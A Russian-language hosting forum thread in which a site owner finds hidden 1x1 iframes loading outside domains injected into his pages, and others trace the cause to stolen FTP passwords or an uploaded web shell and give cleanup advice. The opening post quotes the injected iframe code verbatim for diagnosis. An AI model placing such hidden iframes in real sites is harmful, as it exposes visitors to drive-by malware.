Перейти из форума на сайт.

НовостиФайловые архивы
ПоискАктивные темыТоп лист
ПравилаКто в on-line?
Вход Забыли пароль? Первый раз на этом сайте? Регистрация
Компьютерный форум Ru.Board » Интернет » Хостинг » Вирус через FTP?

Модерирует : 3xp0, PEDKA

 Версия для печати • ПодписатьсяДобавить в закладки

Открыть новую тему     Написать ответ в эту тему

matvs

Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Я администрирую следующие сайты:
 
www.books-online.org.ua
www.galproekt.com.ua
www.uportal.com.ua
 
и др.
 
но сегодня я выяснил, что у меня на хостинге в страницы моих сайтов встраивается следующий код:

Цитата:
 
    Цитата: <body bgColor=#CCCCCC leftMargin=0 topMargin=0 marginheight="0" marginwidth="0"><iframe src=http://dorzentovan.com/sp/ frameborder=0 width=1 height=1 scrolling=no></iframe>
 

 
или

Цитата:
 
    Цитата:<iframe src=http://dorzentovan.com/sp/ frameborder=0 width=1 height=1 scrolling=no></iframe><iframe src=http://dkfjkdkjsl.com/spk2/ frameborder=0 width=1 height=1 scrolling=no></iframe>

 
 
 
 
Что это такое? Вирус? Откуда этот код берется? Ведь я этот код не вписывал в свои страницы.

----------
Все о joomla
Финансовый журнал
Видео-семинары
Всего записей: 213 | Зарегистр. 18-10-2006 | Отправлено: 13:11 21-06-2007
Boss2004



Advanced Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
matvs
Посмотри здесь
Всего записей: 1520 | Зарегистр. 28-02-2004 | Отправлено: 15:30 21-06-2007
matvs

Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Спасибо, нашел я проблему.
 

Цитата:
В случае обнаружения следов вируса необходимо выполнить
следующие действия с обязательным соблюдением порядка:
 
1. Удалить вирусное содержимое со страниц вашего сайта.
2. Проверить локальный компьютер на наличие вирусов.
3. Зайти в панель управления хостинг-аккаунтом
и изменить пароль на пользователя FTP.  



----------
Все о joomla
Финансовый журнал
Видео-семинары
Всего записей: 213 | Зарегистр. 18-10-2006 | Отправлено: 16:08 21-06-2007
MasZid



Junior Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Помогло? Это похоже на эксплоитов, которые сами подсаживаются на комп а потом воруюn ftp. Так что надо начинать с чистк компа. потом все остальное.
Всего записей: 153 | Зарегистр. 13-03-2006 | Отправлено: 18:33 26-06-2007
matvs

Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Странно что NOD этого вируса не видит. У меня постоянно обновляется антивирус NOD.

----------
Все о joomla
Финансовый журнал
Видео-семинары
Всего записей: 213 | Зарегистр. 18-10-2006 | Отправлено: 13:36 27-06-2007
lameruga

Newbie		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
херовая штака iframe
Всего записей: 16 | Зарегистр. 28-05-2004 | Отправлено: 15:31 27-06-2007
disaboard



Junior Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
?
Всего записей: 66 | Зарегистр. 26-10-2005 | Отправлено: 15:34 27-06-2007
mlinnn

Newbie		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
iframe ведущий на эксплойт...
Всего записей: 6 | Зарегистр. 11-09-2006 | Отправлено: 06:15 30-06-2007
Cheery



.:МордератоР:.		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
matvs
Кто должен лечить вирусы на сайте: хостер или я?

----------
Away/DND
Всего записей: 52737 | Зарегистр. 04-04-2002 | Отправлено: 06:43 30-06-2007
LMZiushka

Newbie		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
очень интересно, на какой именно стадии вирус вставляй iframe'ы.
Всего записей: 21 | Зарегистр. 28-06-2007 | Отправлено: 09:12 30-06-2007
matvs

Member		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
очень интересно, на какой именно стадии вирус вставляй iframe'ы.

У меня такое предположение, что вирус перехватывает мои файлы через интернет-провайдера, когда я закачиваю их на ФТП и добавляет свой код. Например, когда я закачиваю на сервер архивы, то вирус в них не проникает.

----------
Все о joomla
Финансовый журнал
Видео-семинары
Всего записей: 213 | Зарегистр. 18-10-2006 | Отправлено: 12:00 02-07-2007
proton4ik



Newbie		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
аналогичная проблема!
смена ftp пароля не помогла.
 
какие варианты (а еще лучше - кто сталкивался с подобным?)?
Всего записей: 13 | Зарегистр. 16-12-2007 | Отправлено: 16:31 25-02-2010
Pycckuu_ykpon

Newbie		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
proton4ik
так выше написано же - если у вас сниффер на компе, то после смены новый пароль уже будет автоматом утащен. Читай топик с самого начала и делай все по шагам.
Всего записей: 6 | Зарегистр. 23-02-2010 | Отправлено: 16:54 25-02-2010
polindrom

Newbie		Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору

Цитата:
а еще лучше - кто сталкивался с подобным?

 
Я сталкивался.  
В первом случае уперли пароль от FTP и переписали html страницы на сайте. Поменял пароль, удалил проян с компа.
 
 
Во втором случае на сайт был залит сторонний скрипт (шелл) который переписывал шаблон сайта. Нашел и удалил с сервера левую папку со скриптом, но через некоторое время она появилась снова. Знакомые помогли определить уязвимость через которую заливают шелл. После латания дыры левая папка болше не появлялась.  
 
Так же ставьте права ТОЛЬКО ЧТЕНИЕ на все папки и файлы к которым доступ на запись не нужен.
Всего записей: 5 | Зарегистр. 25-02-2010 | Отправлено: 13:41 15-03-2010
Открыть новую тему     Написать ответ в эту тему

Компьютерный форум Ru.Board » Интернет » Хостинг » Вирус через FTP?


Реклама на форуме Ru.Board.

Powered by Ikonboard "v2.1.7b" © 2000 Ikonboard.com
Modified by Ru.B0ard
© Ru.B0ard 2000-2024

BitCoin: 1NGG1chHtUvrtEqjeerQCKDMUi6S6CG4iC

Рейтинг.ru